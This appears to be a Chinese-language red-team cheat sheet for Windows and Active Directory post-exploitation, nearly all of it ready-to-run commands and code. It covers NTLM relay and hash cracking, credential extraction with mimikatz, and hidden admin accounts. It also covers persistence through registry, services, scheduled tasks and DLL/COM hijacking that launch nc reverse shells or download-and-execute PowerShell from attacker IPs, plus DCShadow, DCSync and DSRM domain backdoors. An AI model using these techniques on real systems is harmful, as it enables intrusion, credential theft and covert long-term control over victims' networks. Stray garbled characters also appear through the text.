修改/etc/responder/Responder.conf文件,配置smb和http為Off,分別開啟兩個對話框,使用F參數啟用WPAD欺騙瀏覽器,使用/usr/share/responder/tools中的MultiReplay.py進行中繼攻擊獲得目標cmdshell��。>Responder -I eth0 -v -F>python MultiReplay.py -t 192.168.0.115 -u ALL
NTLMv2Hash破解
使用hashcat破解 -m 5600為NTLMv2類型>hashcat -m 5600 pass.txt wordlists.txt
GPP-Password
域內機器可訪問\\zone.com\SYSVOL\zone.com共享文件夾,翻看策略文件,查找groups.xml,ScheduledTasks\ScheduledTasks.xml,Printers\Printers.xml,Drives\Drives.xml,DataSources\DataSources.xml, Services\Services.xml等文件
使用powersploit腳本解密
使用msf的auxiliary/scanner/smb/smb_enum_gpp模塊
WinRM無文件執行
>winrm quickconfig –q啟動winrm或PS>Enable-PSRemoting -Force生成木馬并啟動監聽
放入已獲得權限的機器C盤中內網另外機器中執行>net use \\192.168.0.115\c$>winrm invoke create wmicimv2/win32_process @{commandline="\\192.168.0.115\c\index.exe"}
添加域管命令
>net user admin$ pass@123 /add /doamin>net group "Domain admins" admin$ /add /domain
SSH密鑰免密登錄
>ssh -i id_rsa user@192.168.0.110
獲取保存的RDP密碼
位置C:\Users\用戶名\AppData\Local\Microsoft\Credentials查看命令>cmdkey /list>mimikatz log#dpapi::cred /in:C:\Users\administrator\AppData\Local\Microsoft\Credentials\D53BF8DC4D52D75463D46595907A4015記錄guidMasterKey: {572115f2-80b1-4b1e-be1b-425f5c7a8bfd}#privilege::debug#sekurlsa::dpapi找到GUID為guidMasterKey的值下面的MasterKey: d928f5e02d2e9495f92bb…#dpapi::cred /in:C:\Users\administrator\AppData\Local\Microsoft\Credentials\D53BF8DC4D52D75463D46595907A4015 /masterkey: d928f5e02d2e9495f92bb…密碼為CredentialBlob值�。
后門&持久化
影子用戶
>net user test$ test /add>net localgroup administrators test$ /add注冊表HKEY_LOCAL_MACHINE\SAM\SAM\給予administrator SAM的完全控制和讀取的權限以下導出為1.regHKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names\test$記錄HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names\test$的默認類型000003EA以下導出為2.regHKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000003EA默認administrator默認類型為000001F4以下導出為3.regHKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000001F4把000001F4(3.reg)的F值粘貼到000003EA(2.reg)的F值修改后導入>regedit /s 1.reg>regedit /s 2.reg刪除net user test$ /delPowershell腳本https://github.com/3gstudent/Windows-User-Clone/blob/master/Windows-User-Clone.ps1需system權限>Create-Clone -u 要創建的 -p 密碼 -cu 想要克隆的
RID劫持
利用場景:激活guest修改rid為管理員的修改低權限用戶rid劫持rid之前普通用戶1的rid值
使用msf的post/windows/manage/rid_hijack模塊
運行后可以看到已經變為超管的rid值
此時普通用戶1登錄系統是為超管權限
Guest激活
激活來賓賬戶,修改其密碼,加入administrators組>net user guest /active:yes>net user guest 123qwe!@#>net localgroup administrators guest /ad
映像劫持
Sethc
>move sethc.exe 1.exe>copy cmd.exe sethc.exe5下shift調用cmd
輕松使用
注冊表計算機\HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\新建Utilman.exe,新建字符串值Debugger,指定為C:\Windows\System32\cmd.exe> REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe" /t REG_SZ /v Debugger /d "C:\windows\system32\cmd.exe" /f
IFEO靜默執行
計算機\HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe 新建DWORD值GlobalFlag 16進制為200創建:計算機\HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\sethc.exe字符串值:MonitorProcess=muma.exeDWORD值ReportingMode=1>reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /f>reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v GlobalFlag /t REG_DWORD /d 512 /f>reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\sethc.exe" /v ReportingMode /t REG_DWORD /d 1 /f>reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\sethc.exe" /v MonitorProcess /t REG_SZ /d "c:\windows\system32\cmd.exe" /f
注冊表啟動項
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunHKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceHKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\RunHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce
MSF
添加一個監聽Meterpreter> reg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v nc -d 'C:\windows\system32\nc.exe -Ldp 444 -e cmd.exe'查詢是否添加成功Meterpreter> reg queryval -k HKLM\\software\\microsoft\\windows\\currentversion\\Run -v ncMeterpreter> reg enumkey -k HKLM\\software\\microsoft\\windows\\currentversion\\run開啟防火墻進站規則> netsh firewall add portopening TCP 444 "name" ENABLE ALL重啟> shutdown -r -t 0
CMD
查看注冊表啟動項>REG query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"添加啟動項>REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "windowsupdate" /t REG_SZ /F /D "c:\windows\temp\update.exe"刪除啟動項>REG delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "windowsupdate" /f
計劃任務
加載powershell
>schtasks /Create /tn 名字 /tr 運行程序 /sc hourly /mo 1>schtasks /create /S TARGET /SC Weekly /RU "NT Authority\SYSTEM" /TN "STCheck" /TR "powershell.exe -c 'iex (New-Object Net.WebClient).DownloadString(''http://192.168.0.107:8080/Invoke-PowerShellTcp.ps1''')'"
執行exe
創建計劃任務>schtasks /create /RL HIGHEST /F /tn "windowsupdate" /tr "c:\windows\temp\update.exe" /sc DAILY /mo 1 /ST 12:25 /RU SYSTEM查看計劃任務>schtasks /query | findstr "windowsupdate"立即執行某項計劃任務>schtasks /run /tn "windowsupdate"刪除某項計劃任務>schtasks /delete /F /tn "windowsupdate"普通用戶權限計劃任務>schtasks /create /F /tn "windowsupdate" /tr "D:\user\zhangsan\file\windowsupdate.exe" /sc DAILY /mo 1 /ST 12:25>schtasks /query | findstr "windowsupdate">schtasks /run /tn "windowsupdate">schtasks /delete /F /tn "windowsupdate">schtasks /tn "SysDebug" /query /fo list /v
進程注入
AppCertDlls
注冊表HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SessionManager\下新建AppCertDlls,新建名字為Default,值為c:\1.dll的項#msfvenom –p windows/meterpreter/reverse_tcp LHOST=192.168.1.1 LPORT=4444 –f dll >/root/1.dllMsf>use exploit/multi/handlerMsf>set payload windows/meterpreter/reverse_tcphttps://cdn.securityxploded.com/download/RemoteDLLInjector.zip> RemoteDLLInjector64.exe PID c:\1.dll
AppInit_DLLs
注冊表HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsNT\CurrentVersion\Window\Appinit_Dlls下AppInit_DLLs設置為c:\1.dll,LoadAppInit_DLLs設置為1
MSF
Msf>use post/windows/manage/reflective_dll_injectMsf>set session 1Msf>set pid 1234Msf>set path c:\\1.dllMsf>run&migrate +pid&Meterpreter>run post/windows/manage/migrate
登錄初始化
計算機\HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon下添加Userinit值>Powershell.exe Set-ItemProperty "HKLM:\SOFTWARE\Microsoft\WINDOWS NT\CurrentVersion\Winlogon" -name Userinit -value "C:\Windows\system32\userinit.exe,c:\muma.exe"計算機\HKEY_CURRENT_USER\Environment創建鍵值UserInitMprLogonScript值為c:\muma.exe&Powershell實現:>Set-ExecutionPolicy RemoteSigned保存ps1執行Set-ItemProperty "HKLM:\SOFTWARE\Microsoft\WINDOWS NT\CurrentVersion\Winlogon" -name Userinit -value "C:\Windows\system32\userinit.exe,powershell.exe -nop -w hidden -c $w=new-object net.webclient;$w.proxy=[Net.WebRequest]::GetSystemWebProxy();$w.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $w.downloadstring('http://192.168.2.11:8080/kaMhC1');"# powershell反彈shell的payload參照msf中的web_delivery模塊
屏幕保護程序
計算機\HKEY_CURRENT_USER\Control Panel\DesktopSCRNSAVE.EXE - 默認屏幕保護程序,改為惡意程序(設置備份)ScreenSaveActive - 1表示屏幕保護是啟動狀態,0表示表示屏幕保護是關閉狀態ScreenSaverTimeout - 指定屏幕保護程序啟動前系統的空閑事件,單位為秒,默認為900(15分鐘)
MOF
>git clone https://github.com/khr0x40sh/metasploit-modules.git>mv metasploit-modules/persistence/mof_ps_persist.rb /usr/share/metasploit-framework/modules/post/windows/>reload_all>use post/windows/mof_ps_persist>set payload windows/x64/meterpreter/reverse_tcp>set lhost 192.168.0.108>set lport 12345>set session 1>run
>use exploit/multi/handler>set payload windows/x64/meterpreter/reverse_tcp>set lhost 192.168.0.108>set lport 12345>set exitonsession false
重啟后還會上線
清除后門,進入meterpreter,resource 生成的rc文件停止MOF>net stop winmgmt刪除文件夾:C:\WINDOWS\system32\wbem\Repository\>net start winmgmt
WinRM端口復用
WinRM端口5985,win2012以上默認啟動,2008開啟命令>winrm quickconfig -q2012啟用端口復用>winrm set winrm/config/service @{EnableCompatibilityHttpListener="true"}2008啟用WinRM后修改端口為80>winrm set winrm/config/Listener?Address=*+Transport=HTTP @{Port="80"}后門連接和使用本地開啟WinRM并設置信任連接主機>winrm quickconfig -q>winrm set winrm/config/Client @{TrustedHosts="*"}執行命令>winrs -r:http://10.1.1.100 -u:administrator -p:password ipconfig /all獲取cmdshell>winrs -r:http://10.1.1.100 -u:administrator -p:password cmd
只administrator允許遠程登錄WinRM,允許其他用戶可以登錄,執行注冊表>reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f
創建服務
重啟維持nc>sc create ms binpath= "cmd /K start c:\nc\nc64.exe -d 192.168.0.51 4567 -e cmd.exe" start= delayed-auto error= ignore重啟維持psh#msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.0.107 LPORT=11111 -f psh-reflection >/var/www/html/xxx.ps1>sc create ms binpath= "cmd /K start C:\WINDOWS\system32\WindowsPowerShell\v1.0\powershell.exe -nop -exec bypass -c \"IEX(New-Object net.webclient).DownloadString('http://192.168.0.107/xxx.ps1')\"" start= delayed-auto error= ignore
重啟維持Cobalt strike配置監聽器,生成web傳遞模塊Powershell腳本>sc create ms binpath= "cmd /K start C:\WINDOWS\system32\WindowsPowerShell\v1.0\powershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring('http://192.168.0.107:8080/a'))\"" start= delayed-auto error= ignore
Delay執行大概2分鐘上線>sc delete ms 卸載服務Powershell>powershell.exe new-service -Name nuoyani -BinaryPathName "C:\WINDOWS\Temp\360.exe" -StartupType Automatic>$c2='new-';$c3='service -Name nuoyani -DisplayName OrderServ -BinaryPathName "C:\accc.exe" -StartupType Automatic'; $Text=$c2+$c3;IEX(-join $Text)
Bitadmin
創建下載任務>bitsadmin /create empire下載的文件設置>bitsadmin /addfile empire %comspec% c:\windows\temp\1.exe設置傳輸時運行的命令,MSFvenom生成dll放入temp目錄>bitsadmin /SetNotifyCmdLine empire cmd.exe "cmd.exe /c rundll32 c:\windows\temp\1.dll,0"(bitsadmin /SetNotifyCmdLine backdoor regsvr32.exe "/u /s /i:https://x.com/shell.sct scrobj.dll")啟動任務>bitsadmin /resume empire列出所有用戶的下載任務>bitsadmin /list /allusers /verbose
重啟后也會上線
完成任務>bitsadmin /complete empire>bitsadmin /cancel <Job> //刪除某個任務>bitsadmin /reset /allusers //刪除所有任務&>bitsadmin /create mission>bitsadmin /addfile mission %comspec% %temp%\cmd.exe>bitsadmin.exe /SetNotifyCmdLine mission regsvr32.exe "/u /s /i:http://192.168.0.107/shell.sct scrobj.dll">bitsadmin /Resume mission
CLR Injection
劫持調用.net程序,開機啟動https://github.com/3gstudent/CLR-Injection/blob/master/CLR-Injection_x64.bat
WMIC可替換為powershellNew-ItemProperty "HKCU:\Environment\" COR_ENABLE_PROFILING -value "1" -propertyType string | Out-NullNew-ItemProperty "HKCU:\Environment\" COR_PROFILER -value "{11111111-1111-1111-1111-111111111111}" -propertyType string | Out-Nullwmic ENVIRONMENT create name="COR_ENABLE_PROFILING",username="%username%",VariableValue="1"wmic ENVIRONMENT create name="COR_PROFILER",username="%username%",VariableValue="{11111111-1111-1111-1111-111111111111}"certutil.exe -urlcache -split -f https://raw.githubusercontent.com/3gstudent/test/master/msg.dllcertutil.exe -urlcache -split -f https://raw.githubusercontent.com/3gstudent/test/master/msg.dll deletecertutil.exe -urlcache -split -f https://raw.githubusercontent.com/3gstudent/test/master/msg_x64.dllcertutil.exe -urlcache -split -f https://raw.githubusercontent.com/3gstudent/test/master/msg_x64.dll deleteSET KEY=HKEY_CURRENT_USER\Software\Classes\CLSID\{11111111-1111-1111-1111-111111111111}\InProcServer32REG.EXE ADD %KEY% /VE /T REG_SZ /D "%CD%\msg_x64.dll" /FREG.EXE ADD %KEY% /V ThreadingModel /T REG_SZ /D Apartment /FSET KEY=HKEY_CURRENT_USER\Software\Classes\WoW6432Node\CLSID\{11111111-1111-1111-1111-111111111111}\InProcServer32REG.EXE ADD %KEY% /VE /T REG_SZ /D "%CD%\msg.dll" /FREG.EXE ADD %KEY% /V ThreadingModel /T REG_SZ /D Apartment /F添加全局變量計算機\HKEY_CURRENT_USER\EnvironmentCOR_ENABLE_PROFILING=1COR_PROFILER={11111111-1111-1111-1111-111111111111}注冊CLSID計算機\HKEY_CURRENT_USER\Software\Classes\CLSID添加項{11111111-1111-1111-1111-111111111111}和它的子項InprocServer32新建一個鍵ThreadingModel,鍵值為:Apartment,默認鍵值為dll路徑劫持explorer.exe>SET COR_ENABLE_PROFILING=1>SET COR_PROFILER={11111111-1111-1111-1111-111111111111}位置(新建)HKEY_CURRENT_USER\Software\Classes\CLSID\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InprocServer32默認值為惡意DLL新建ThreadingModel值為Apartment
COM OBJECT hijacking
CAccPropServicesClass and MMDeviceEnumerato
無需超管權限,無需重啟https://github.com/3gstudent/COM-Object-hijacking將惡意DLLbase64編碼寫入ps腳本
執行后會在%appdata%\Microsoft\Installer\{BCDE0395-E52F-467C-8E3D-C4579291692E}目錄釋放2個文件,分別是x86和x64的dll會在注冊表中HKEY_CURRENT_USER\Software\Classes\CLSID\新建{b5f8350b-0548-48b1-a6ee-88bd00b4a5e7}和子項默認指向惡意DLL只要指向.net程序便可上線����。如ie,mmc等
Explorer
注冊表位置:HKCU\Software\Classes\CLSID\創建項{42aedc87-2188-41fd-b9a3-0c966feabec1}創建子項InprocServer32Default的鍵值為惡意dll的絕對路徑:C:\test\1.dll創建鍵值: ThreadingModel REG_SZ Apartment
HKCU\Software\Classes\CLSID{42aedc87-2188-41fd-b9a3-0c966feabec1}HKCU\Software\Classes\CLSID{fbeb8a05-beee-4442-804e-409d6c4515e9}HKCU\Software\Classes\CLSID{b5f8350b-0548-48b1-a6ee-88bd00b4a5e7}HKCU\Software\Classes\Wow6432Node\CLSID{BCDE0395-E52F-467C-8E3D-C4579291692E}
Squibledoo
創建1.sct
<?XML version="1.0"?><scriptlet><registration description="Component" prog version="1.00" class></registration> <public> <method name="exec"> </method></public><script language="JScript"> <![CDATA[ function exec(){ new ActiveXObject('WScript.Shell').Run('calc.exe'); } ]]></script></scriptlet>
創建COM對象>regsvr32.exe /s /i:http://192.168.0.107/1.sct scrobj.dll觸發>cscript 1.jsvar test = new ActiveXObject("Component.TESTCB");test.exec()
DLL劫持
劫持1
注冊表HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SessionManager\ExcludeFromKnownDlls下添加 "lpk.dll"(若無,自己創建)ExcludeFromKnownDlls可使KnownDLLs失效需要重新啟動電腦查找可劫持的DLL:1.啟動程序2.使用Process Explorer查看該應用程序啟動后加載的DLL��。3.從已經加載的DLL列表中,查找在上述“KnownDLLs注冊表項”中不存在的DLL����。HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\KnownDLLs4.編寫第三步中獲取到的DLL的劫持DLL�����。5.將編寫好的劫持DLL放到該應用程序目錄下,重新啟動該應用程序,檢測是否劫持成功��。
Explorer.exe啟動調用winrar文件夾的RarExt.dllMsf監聽
復制dll文件到the-backdoor-factory文件夾中,加載惡意dll進原dll>python backdoor.py -f RarExt.dll -s reverse_shell_tcp_inline -P 12138 -H 192.168.0.107 指定為kali監聽的IP和端口
生成好的dll在backdoored文件夾,傳入靶機中,替換原dll文件,最好把原dll保存備份��。每次打開windows資源管理器的時候,即可上線���。重啟可維持
劫持2
使用https://github.com/coca1ne/DLL_Hijackerhttps://github.com/git20150901/DLLHijack_Detecter查看要劫持的DLL的函數導出表,會直接生成cpp源碼,重編譯指向惡意代碼DLLHijack_Detecter可查看程序加載的不在KnownDLLs中的DLL
MSDTC服務劫持
服務名稱MSDTC,顯示名稱Distributed Transaction Coordinator對應進程msdtc.exe,位于%windir%system32C:\Windows\System32\wbem\服務啟動搜索注冊表位置計算機\HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\MSDTC\MTxOCI#msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.0.51 LPORT=4444 -f dll -o /var/www/html/oci.dllOci.dll放入c:\windows\system32\重啟服務即可>taskkill /f /im msdtc.exe
Rattler
自動化查找可劫持的DLLhttps://github.com/sensepost/rattler使用>Rattler_x64.exe calc.exe 1會列出可被劫持的DLL
按程序讀取DLL位置順序,把惡意DLL放入程序同目錄后,執行程序即可���。
DLL代理劫持右鍵
右鍵對應的注冊表路徑是HKLM\Software\Classes\*\ShellEx\ContextMenuHandlers使用autoruns查看加載的DLL
以rarext.dll為例使用https://github.com/rek7/dll-hijacking創建代理DLL注意修改parse.py中dumpbin.exe的位置
>python3 parse.py -d rarext.dll
修改原DLL為rarext_.dll,重新生成解決方案命名為rarext.dll將兩個DLL放入原目錄,重啟
使用AMSI掃描接口維持權限
https://gist.github.com/b4rtik/48ef702603d5e283bc81a05a01fccd40現amsi已經集成到win10以下組件中UACPowerShellWindows腳本(wscript.exe和cscript.exe)JavaScript和VBScriptOffice VBA宏
這里使用nc來反彈個shell
使用regsvr32注冊dll或手動添加HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\GUID(默認)REG_SZ “提供程序描述”HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\GUID\InprocServer32 (默認)REG_EXPAND_SZ " DLL的路徑" -ThreadingModel REG_SZ "Both"HKLM \ SOFTWARE \ Microsoft \ AMSI \ Providers \ GUIDRegsvr32使用超管權限
一旦注冊,Dll將被加載到任何涉及AMSI和SampleAmsiProvider::Scan方法的進程中,比如在程序中設定,在powershell下發送字符串,觸發scan方法,當發送字符串為我們設定的字符串的時候就觸發惡意DLL
DLL劫持計劃任務
function Invoke-ScheduledTaskComHandlerUserTask{[CmdletBinding(SupportsShouldProcess = $True, ConfirmImpact = 'Medium')]Param ([Parameter(Mandatory = $True)][ValidateNotNullOrEmpty()][String]$Command, [Switch]$Force)$ScheduledTaskCommandPath = "HKCU:\Software\Classes\CLSID\{58fb76b9-ac85-4e55-ac04-427593b1d060}\InprocServer32"if ($Force -or ((Get-ItemProperty -Path $ScheduledTaskCommandPath -Name '(default)' -ErrorAction SilentlyContinue) -eq $null)){New-Item $ScheduledTaskCommandPath -Force |New-ItemProperty -Name '(Default)' -Value $Command -PropertyType string -Force | Out-Null}else{Write-Verbose "Key already exists, consider using -Force"exit} if (Test-Path $ScheduledTaskCommandPath) {Write-Verbose "Created registry entries to hijack the UserTask"}else{Write-Warning "Failed to create registry key, exiting"exit}}
Invoke-ScheduledTaskComHandlerUserTask -Command "C:\test\testmsg.dll" -Verbose重啟權限可維持
DLL注入
Powershell
生成DLL>msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.0.105 LPORT=6666 -f dll -o /var/www/html/x.dll>use exploit/multi/handler>set payload windows/x64/meterpreter/reverse_tcp>Powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://192.168.0.105/powersploit/CodeExecution/Invoke-DllInjection.ps1'); Invoke-DllInjection -ProcessID pid -Dll .\1.dll"
InjectProc
生成DLL#msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.0.107 LPORT=12138 -f dll -o /var/www/html/qq.dll#use exploit/multi/handler#set payload windows/x64/meterpreter/reverse_tcp使用如下命令注入進程>InjectProc.exe dll_inj qq.dll xx.exe(存在的進程)
通過控制面板加載項維持權限
編譯為dll,這里是彈框測試
#include <Windows.h>#include "pch.h" //Cplappletextern "C" __declspec(dllexport) LONG Cplapplet( HWND hwndCpl, UINT msg, LPARAM lParam1, LPARAM lParam2){ MessageBoxA(NULL, "inject control panel.", "Control Panel", 0); return 1;} BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved){ switch (ul_reason_for_call) { case DLL_PROCESS_ATTACH: { Cplapplet(NULL, NULL, NULL, NULL); } case DLL_THREAD_ATTACH: case DLL_THREAD_DETACH: case DLL_PROCESS_DETACH: break; } return TRUE;}
添加到注冊表中,只要運行control命令打開控制面板即可加載dllreg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Control Panel\CPLs" /v spotless /d "C:\xxx\dll.dll" /f
通過自定義.net垃圾回收機制進行DLL注入
低權限用戶可指定.net應用程序使用自定義垃圾收集器(GC),一個自定義GC可以以COMPLUS_GCName此環境變量指定,只需將此環境變量指向到惡意DLL,自定義GC的DLL需要一個名為GC_VersionInfo的導出表����。下面是個彈框DLL
#include <Windows.h> BOOL APIENTRY DllMain( HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved ){ switch (ul_reason_for_call) { case DLL_PROCESS_ATTACH: case DLL_THREAD_ATTACH: case DLL_THREAD_DETACH: case DLL_PROCESS_DETACH: break; } return TRUE;} struct VersionInfo{ UINT32 MajorVersion; UINT32 MinorVersion; UINT32 BuildVersion; const char* Name; }; extern "C" __declspec(dllexport) void GC_VersionInfo(VersionInfo * info){ info->BuildVersion = 0; info->MinorVersion = 0; info->BuildVersion = 0; MessageBoxA(NULL, "giao", "giao", 0);}
后執行任意.net程序可加載此DLL
當然也可以加載shellcodehttps://github.com/am0nsec/MCGC
Windows FAX DLL Injection
惡意DLL改名為fxsst.dll放置在c:\windows\目錄即可實現對explorer.exe的劫持
DSRM+注冊表ACL后門
>reg add HKLM\System\CurrentControlSet\Control\Lsa /v DSRMAdminLogonBehavior /t REG_DWORD /d 2允許DSRM賬戶遠程訪問https://github.com/HarmJ0y/DAMP效果:域內任何用戶可讀取域控hashsystem權限執行>psexec.exe -accepteula -s -i -d cmd.exe域控制器執行PS>Add-RemoteRegBackdoor -ComputerName 域控名 -Trustee 'S-1-1-0' –Verbose
域內機器執行https://raw.githubusercontent.com/HarmJ0y/DAMP/master/RemoteHashRetrieval.ps1PS> Get-RemoteLocalAccountHash -ComputerName 域控 –Verbose
域控上執行>reg add HKLM\System\CurrentControlSet\Control\Lsa /v DSRMAdminLogonBehavior /t REG_DWORD /d 2
PTH攻擊,mimikatz需以管理員身份啟動>mimikatz "privilege::debug" "sekurlsa::pth /domain:dc /user:Administrator /ntlm:9f1770aebd442b6b624bdfe9cbc720dd" exit
DCShadow&SID History
http://192.168.0.107/ps/nishang/ActiveDirectory/Set-DCShadowPermissions.ps1DCShadow攻擊是通過更改AD架構,使域內一臺機器偽造成域控��。此腳本可以通過修改AD對象提供DCShadow攻擊的最小權限����。運行此腳本需要DA(Domain Administrator)權限,可以使指定用戶不需要DA權限使用mimikatz��。域控:dc.zone.com域內機器:sub2k8.zone.com域內普通用戶:y域控執行>Set-DCShadowPermissions -Fakedc sub2k8 -Object dc -username y –Verbose注冊sub2k8為假DC,給予用戶y從sub2k8修改dc的計算機對象的權限�����。
在sub2k8上,以本地system權限啟動一個mimikatz會話,以zone\y權限啟動一個mimikatz會話�。
System權限窗口執行dcshadow攻擊,修改dc的計算機屬性Zone\y權限窗口用于推送添加域管理通過修改安全標識符,將域內普通用戶y提升為域管理用戶>lsadump::dcshadow /object:y /attribute:primaryGroupID /value:512
Zone\y推送>lsadump::dcshadow /push
此時在域控上查詢可見y用戶已經加入域管理組��。
添加SIDHistory后門記錄域管理SID
>Set-DCShadowPermissions -FakeDC sub2k8 -Object y -Username y -Verbose
>lsadump::dcshadow /object:y /attribute:sidhistory /value:S-1-5-21-2346829310-1781191092-2540298887-500推送>lsadump::dcshadow /push
測試
域控中通過mimikatz命令可查詢到SIDHistory
刪除SIDHistory的方法PS>Get-ADUser -Filter {name -eq "y"} –Properties sidhistory|foreach {Set-ADuser $_ –remove @{sidhistory="S-1-5-21-2346829310-1781191092-2540298887-500"}}
刪除功能規則輸入的規則后面加參數-remove即可���。
DCSync后門
服務器管理器找到域->查看->啟用高級功能->右鍵屬性->安全->everyone完全控制>mimikatz.exe "lsadump::dcsync /domain:zone.com /user:administrator" exit
或使用powerview添加一條ACL(域控執行)>Add-DomainObjectAcl -TargetIdentity "DC=ZONE,DC=COM" -PrincipalIdentity 域內用戶 -Rights DCSync -Verbose
使用此賬戶在域內任意主機可使用mimikatz的dcsync功能導出憑據
移除ACL>Remove-DomainObjectAcl -TargetIdentity "DC=zone,DC=com" -PrincipalIdentity 用戶 -Rights DCSync -Verbose
Netsh Helper DLL
https://github.com/outflanknl/NetshHelperBeaconhttps://github.com/rtcrowley/Offensive-Netsh-Helper
MSFvenom生成DLL
生成DLL格式木馬
傳至靶機執行命令>netsh add helper C:\Windows\Temp\help.dll
MSF+web_delivery
關閉netsh權限不會掉,調用的powershell#use exploit/multi/script/web_delivery>set target 2 #PSH>set payload windows/x64/meterpreter/reverse_tcp>set lhost 192.168.0.107>set lport 12345
Visual Studio新建空白DLL項目,源文件添加現有文件https://github.com/rtcrowley/Offensive-Netsh-Helper/blob/master/netshlep.cpp復制生成的代碼進文件中,配置管理器新建x64位數后生成解決方案,配置類型選擇位動態庫復制DLL到靶機執行
>netsh add helper helper.dll
MSF&Shellcode
關閉netsh后權限會掉https://github.com/outflanknl/NetshHelperBeaconMSFvenom生成.c格式>msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.0.107 LPORT=12345 -f c -o /var/www/html/1.cVisual Studio打開項目若系統是64位需設置配置管理器為64位項目,反之32(解決方案右鍵屬性)
將MSF生成shellcode粘貼進相應位置后生成解決方案����。
會在項目目錄x64/Release下生成dll復制DLL到靶機system32目錄下,執行命令>netsh add helper C:\Windows\System32\NetshHelperBeacon.dll
只要啟動netsh就會觸發
MSSQL后門
注冊表自啟動>powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://192.168.0.107/ps/PowerUpSQL/PowerUpSQL.ps1');Get-SQLPersistRegRun -Verbose -Name update -Command 'c:\windows\temp\update.exe' -Instance "zone.com\sub2k8""重啟MSSQL上線(需重啟服務)http://192.168.0.107/ps/Powershellery/Stable-ish/MSSQL/Invoke-SqlServer-Persist-StartupSp.psm1>powershell -ep bypass>IEX (New-Object Net.WebClient).DownloadString('http://192.168.0.107/ps/Powershellery/Stable-ish/MSSQL/Invoke-SqlServer-Persist-StartupSp.psm1')>Invoke-SqlServer-Persist-StartupSp -Verbose -SqlServerInstance "zone.com\sub2k8" -PsCommand "IEX(new-object net.webclient).downloadstring('http://192.168.0.107/xxxx')" 遠程木馬腳本可用CS/Empire生成>net stop mssqlserver>net start mssqlserver映像劫持>powershell -nop -ep bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://192.168.0.107/ps/PowerUpSQL/PowerUpSQL.ps1');Get-SQLPersistRegDebugger -Verbose -FileName sethc.exe -Command "c:\windows\system32\cmd.exe" -Instance "zone.com\sub2k8""DDL事件觸發>powershell -exec bypass>IEX (New-Object Net.WebClient).DownloadString('http://192.168.0.107/ps/PowerUpSQL/Invoke-SqlServer-Persist-TriggerDDL.psm1')>Invoke-SqlServer-Persist-TriggerDDL -Verbose -SqlServerInstance "zone\sub2k8" -PsCommand "IEX(new-object net.webclient).downloadstring('http://192.168.0.107/xxxx')" 遠程木馬文件可用CS/Empire生成>Invoke-SqlServer-Persist-TriggerDDL -Verbose -SqlServerInstance " zone\sub2k8" -Remove 移除后門
NSSM
http://www.nssm.cc/release/nssm-2.24.zipNSSM封裝可執行程序為系統服務>nssm install 服務名稱會自動彈出設置
Path選擇powershell的路徑,arguments直接輸入參數���。啟動服務>nssm start 服務名稱
會上線
重啟電腦,權限也會維持刪除服務>nssm remove <servicename>
添加簽名
https://github.com/secretsquirrel/SigThief>python sigthief.py -i 被竊取的文件 -t 要添加簽名的惡意文件 -o 保存文件>python sigthief.py -i rarext.dll -t rarextdwa.dll -o 1.dll
Metsvc
Meterpreter> run metsvc -A在C:Windows\TEMP下隨機生成目錄三個文件,創建服務metsvc 31337端口連接后門Msf>use exploit/multi/handlerMsf>set payload windows/metsvc_bind_tcpMsf>set rhost 192.168.1.2Msf>set rport 31337Msf>run刪除服務Meterpreter > run metsvc –r
Persistence
